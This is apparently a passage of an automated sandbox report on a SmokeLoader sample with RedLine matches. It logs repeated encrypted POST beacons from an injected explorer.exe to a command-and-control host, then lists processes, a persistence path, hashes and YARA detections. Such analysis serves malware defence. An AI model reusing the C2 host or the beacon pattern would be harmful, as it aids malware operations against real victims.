                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 205
                                            Host: unicea.ws
                                            Oct 19, 2024 06:43:58.872153044 CEST205OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7d 33 d4 9d
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu}3kiH#AWW$3\VI2f2y=T[5N~59&vY_@apZ2p


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            22192.168.2.450024123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:44:00.169258118 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://bmtcjbsxoypbehg.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 260
                                            Host: unicea.ws
                                            Oct 19, 2024 06:44:00.169302940 CEST260OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 45 ec ec
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu]ExHsjUeL}^6k|/3R|xO^~&@nDjR-(+n=`\ dn8%].\O{rLVbsmwE|l!/


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            23192.168.2.450025123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:44:06.414633989 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://hyntfrjgoodahxw.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 291
                                            Host: unicea.ws
                                            Oct 19, 2024 06:44:06.414633989 CEST291OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7f 37 ec a0
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu7VE{GFUPz]zZ?&>#!3L_[R~7)2&=ohk%"m@UG37DWW@


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            24192.168.2.450026123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:44:11.830302000 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://pfdeyqiftydbxp.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 356
                                            Host: unicea.ws
                                            Oct 19, 2024 06:44:11.830326080 CEST356OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 01 c5 b5
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vueIQFsSS+pH^u7V|%]P:?: Lw @-i%VYg+7W4\D@.iXrjS?


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            25192.168.2.450027123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:44:17.796960115 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://oxhmmntuaoqjqw.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 126
                                            Host: unicea.ws
                                            Oct 19, 2024 06:44:17.796978951 CEST126OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2a 00 a6 96
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu*QLY`_q7t~hm-P


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            26192.168.2.450028123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:44:23.953608990 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://jhatysyfpdjacrth.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 335
                                            Host: unicea.ws
                                            Oct 19, 2024 06:44:23.953627110 CEST335OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3a 19 c5 98
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu:|U[%ZxUfh6;s9|"[BH}}RmE2xvCS+\AUJ/4bML#}9xh7*^6,


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            27192.168.2.450029123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:44:29.529582977 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ekrrlfpmfkagxhov.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 176
                                            Host: unicea.ws
                                            Oct 19, 2024 06:44:29.529627085 CEST176OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 79 2f d8 a3
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuy/~"ZquyvD3.~hW_3XATB@b5 U]70-<O[m4b


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            28192.168.2.450030123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:44:35.730554104 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://mwurfcocxsehx.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 131
                                            Host: unicea.ws
                                            Oct 19, 2024 06:44:35.730586052 CEST131OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 44 cb 8e
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuRDDpQeAz#?c(J?


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            29192.168.2.450031123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:44:41.925421953 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://qjdqfxwyvfh.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 165
                                            Host: unicea.ws
                                            Oct 19, 2024 06:44:41.925450087 CEST165OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 63 5f a7 8c
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuc_W@\Xzdyaq!y0 (CUg<K^I5M8m((


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            30192.168.2.450032123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:44:47.595964909 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://gwjmvpjprpa.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 190
                                            Host: unicea.ws
                                            Oct 19, 2024 06:44:47.596019030 CEST190OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 0b c4 87
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuUize@m"[g wMX5nwk9G/p)E:wNe/&LsBgY:?n


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            31192.168.2.450033123.213.233.131802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:44:53.435223103 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://hsokfaschfagb.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 254
                                            Host: unicea.ws
                                            Oct 19, 2024 06:44:53.435261965 CEST254OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 44 01 c4 a7
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuD}C^}hj$Q(o{a<UJEG)*R1OsfZ1o|=Hn,zmczpJ/Upat-4UfZ


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            32192.168.2.450034116.58.10.60802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:44:58.973855972 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://yfwhugqkygknlega.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 137
                                            Host: unicea.ws
                                            Oct 19, 2024 06:44:58.973910093 CEST137OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 42 15 c6 f0
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuBUxsi4rZAol +uP/;j2


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            33192.168.2.450035116.58.10.60802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:45:05.624799967 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://clwlueiouwtdjlp.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 220
                                            Host: unicea.ws
                                            Oct 19, 2024 06:45:05.624835014 CEST220OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4b 27 ce f9
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuK'VWF]d3('q3Q4<X-n:7F3P-R4c^7}}|x[p'~=b,|


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            34192.168.2.450036116.58.10.60802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:45:11.779484987 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://komfkwumjafaljeh.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 331
                                            Host: unicea.ws
                                            Oct 19, 2024 06:45:11.779517889 CEST331OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4d 0a c4 a7
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuMi`lc1R1bCE9`*b%)Zo1XV\HT7LJK_'r%C2^95~L`P4[lW&


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            35192.168.2.450037116.58.10.60802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:45:18.432126045 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://gkcfyfujfvjeukc.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 178
                                            Host: unicea.ws
                                            Oct 19, 2024 06:45:18.432161093 CEST178OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 06 eb fe
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vueXKXms_sBb)N^pQWG0;^)9n_A)~:^@F)v


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            36192.168.2.450038116.58.10.60802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:45:24.746797085 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://dsuiipbvrtqiui.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 117
                                            Host: unicea.ws
                                            Oct 19, 2024 06:45:24.746833086 CEST117OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 0a ab e4
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu+yBX?,b*'c|=q


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            37192.168.2.450039116.58.10.60802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:45:31.552082062 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://cottwgkexhqi.com/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 317
                                            Host: unicea.ws
                                            Oct 19, 2024 06:45:31.552139997 CEST317OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 35 1f d3 e3
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu5+DUHw<1[x-7=7uo"W&PitFzlHOU{KBZ(DFD?C{pBD,lv/V<


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            38192.168.2.450040116.58.10.60802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:45:37.867525101 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://tyhclxkbrciiuit.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 359
                                            Host: unicea.ws
                                            Oct 19, 2024 06:45:37.867558002 CEST359OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7d 57 e9 bf
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vu}W_P{QtXquzwb+y{6"S!#QT*zQk{&T:}'.Z`36-/=![.nKeO$MA,}j]/


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            39192.168.2.450041116.58.10.60802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:45:43.996870041 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://fdwyluiudrfobcvl.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 273
                                            Host: unicea.ws
                                            Oct 19, 2024 06:45:43.996893883 CEST273OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 72 29 fe 93
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vur) ]M_(p~hpIZx}h9n8GYMuiVJ{wn3VCbB'-PtS^[AjcZQBtfB^,>{


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            40192.168.2.461684116.58.10.60802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:45:50.869941950 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://shybhbwsshpkm.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 237
                                            Host: unicea.ws
                                            Oct 19, 2024 06:45:50.869941950 CEST237OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 78 37 c6 ee
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vux7QM_:bK^t{n[IPRfQ=OK5;-3Al2WBm6e2 #+N?oWSC!*wL\ur


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            41192.168.2.461685116.58.10.60802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:45:57.441528082 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://ejvcjodbems.net/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 154
                                            Host: unicea.ws
                                            Oct 19, 2024 06:45:57.441571951 CEST154OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 46 23 d0 be
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vuF#KPy@i$`|[8>*/G=E)_*;MVDL\!Hx;


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            42192.168.2.461686116.58.10.60802580C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 19, 2024 06:46:05.412533998 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://oilnmucjwyntrxl.org/
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Length: 189
                                            Host: unicea.ws
                                            Oct 19, 2024 06:46:05.412570000 CEST189OUTData Raw: 3b 6e 21 15 83 c8 6a 20 ae a8 c0 01 73 77 73 b6 0a 0e ba 91 1e 03 95 62 7e 0f 73 91 40 c3 b3 69 ee 5e cf 58 72 6e 27 1a 9a 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 72 40 e8 e9
                                            Data Ascii: ;n!j swsb~s@i^Xrn'? 9Yt M@NA .[k,vur@O0^nQnrmQw0"IRi"3BI @tC+4A,r"


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:00:41:58
                                            Start date:19/10/2024
                                            Path:C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\50f86ebddd156619b173883981364d8955365d76d2c3a.exe"
                                            Imagebase:0x400000
                                            File size:454'144 bytes
                                            MD5 hash:EA2E25EFD40CEBD5E9535B91D8E3F61F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1763780369.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1763780369.0000000000630000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1763754201.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1763649292.0000000000502000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1763825635.0000000000651000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1763825635.0000000000651000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                            Reputation:low
                                            Has exited:true

                                            Target ID:1
                                            Start time:00:42:03
                                            Start date:19/10/2024
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff72b770000
                                            File size:5'141'208 bytes
                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:5
                                            Start time:00:42:22
                                            Start date:19/10/2024
                                            Path:C:\Users\user\AppData\Roaming\vbirvce
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\vbirvce
                                            Imagebase:0x400000
                                            File size:454'144 bytes
                                            MD5 hash:EA2E25EFD40CEBD5E9535B91D8E3F61F
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1996874431.0000000000701000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1996782285.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1996782285.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
